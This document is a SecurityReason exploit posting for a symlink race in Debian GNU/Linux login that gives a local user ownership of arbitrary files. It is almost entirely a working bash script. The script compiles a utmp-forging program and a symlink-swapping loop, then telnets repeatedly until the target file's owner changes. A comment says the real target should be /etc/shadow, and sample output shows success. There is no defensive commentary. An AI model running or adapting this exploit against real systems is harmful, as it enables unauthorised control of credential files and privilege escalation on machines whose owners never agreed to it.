SecurityReason - Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC ( Exploit )

Exploit Code :

#!/bin/bash -

echo '
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <utmp.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
struct utmp entry;
int i;

entry.ut_type=LOGIN_PROCESS;
strcpy(entry.ut_line,"/tmp/x");
entry.ut_time=0;
strcpy(entry.ut_user,"badguy");
strcpy(entry.ut_host,"badhost");
entry.ut_addr=0;
for(i=1;i<9;i++) {
entry.ut_pid=(pid_t)( i + (int)getpid() );
sprintf(entry.ut_id,"bad%d",i);
pututline(&entry);
}
}
' > /tmp/fillutmp.c

cc -o /tmp/fillutmp /tmp/fillutmp.c

echo 'Ask someone with group utmp privileges to do:'
echo ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'
echo -n 'Press [RETURN] to continue... '
read ANS

echo '
#include <unistd.h>

int main(int argc, char *argv[])
{
while(1)
{
unlink("/tmp/x");
symlink(argv[1],"/tmp/x");
unlink("/tmp/x");
symlink(argv[2],"/tmp/x");
}
}
' > /tmp/jigglelnk.c

cc -o /tmp/jigglelnk /tmp/jigglelnk.c

HOST=`hostname` # or simply localhost?
echo "Which tty do you think a 'telnet $HOST' will use next?"
echo "(Do that telnet and see...)"
read TTY
echo "You said it will be '$TTY' ..."

ATK=/etc/debian_version # should be /etc/shadow

echo "Starting symlink re-jiggler ..."
/tmp/jigglelnk $TTY $ATK &
JIG=$!

LOOP=0
while :; do
((LOOP = $LOOP + 1))
echo; echo; echo "Try = $LOOP"

/tmp/fillutmp

echo "Telnetting... if login succeeds, just exit for next try..."
/usr/bin/telnet $HOST

LS=`ls -ld $ATK`
case "$LS" in
*root*root* ) ;; # not done yet...
* )
echo; echo
echo "Success after $LOOP tries!"
echo "$LS"
echo; echo
break
;;
esac
done

kill $JIG
rm /tmp/fillutmp /tmp/jigglelnk /tmp/x

# ...
# ~$ logout
# Connection closed by foreign host.
# Success after 12 tries!
# -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version